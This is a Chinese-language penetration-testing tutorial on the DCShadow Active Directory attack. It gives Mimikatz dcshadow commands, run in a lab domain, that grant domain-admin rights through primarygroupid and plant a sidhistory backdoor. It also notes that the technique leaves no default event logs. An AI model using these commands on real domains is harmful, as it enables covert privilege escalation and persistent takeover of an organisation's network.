域滲透：DCShadow攻擊與利用

域滲透：DCShadow攻擊與利用

來自專欄安全客4 人贊了文章

一、原理

我們知道可以利用Mimikatz遠程從DC中複製數據，即Dcsync; 類似的dcshadow可以偽裝成DC，讓正常DC通過偽造的DC中複製數據。

步驟

1、通過dcshadow更改配置架構和註冊SPN值，將我們的伺服器註冊為Active Directory中的DC

2、在我們偽造的DC上更改數據，並利用域複製將數據同步到正常DC上。

相關API:DSBind、DSR*等

https://msdn.microsoft.com/en-us/library/ms675931(v=vs.85).aspx

從原理中我們可以認識到兩點：

1、需要具備域管許可權或域控本地管理許可權，註冊spn值，寫許可權等

2、除了dc之間的連接通信，默認情況下不會記錄事件日誌

二、利用條件

測試環境：dc機器2008r2 x64、偽裝機器：win7 x64

準備條件：（兩個窗口）

1、win7 system許可權 (1號窗口)，可以利用psexec -s cmd調system會話，也可以用mimikatz運行驅動模式，確保所有線程都運行在system上

2、win7 域管許可權 （2號窗口）

在win7 中利用psexec 調用cmd即可：

三、利用方式

1、更改屬性描述值

1號窗口執行數據更改與監聽（後同）：

lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:description /value:」anquanke-test2018!!」

2號窗口執行域複製（後同）：

lsadump::dcshadow /push

在dc2008上查看結果：

2、添加域管

lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:primarygroupid/value:512

執行域複製後成功添加域管：

3、添加sidhistory 後門

查看域管administrator sid：

lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:sidhistory /value:S-1-5-21-1900941692-2128706383-2830697502-500

使用dc用戶建立net use 鏈接後可成功訪問域控：

四、總結

Dcshadow 的利用我們可以做很多事情，包括ldap用戶的修改，添加後門（sidhistory後門， AdminSDHolder後門，acl後門等等），在碰到域防護較為嚴格的時候，往往能起到很好的bypass的效果。

作者：t0stmail

推薦閱讀：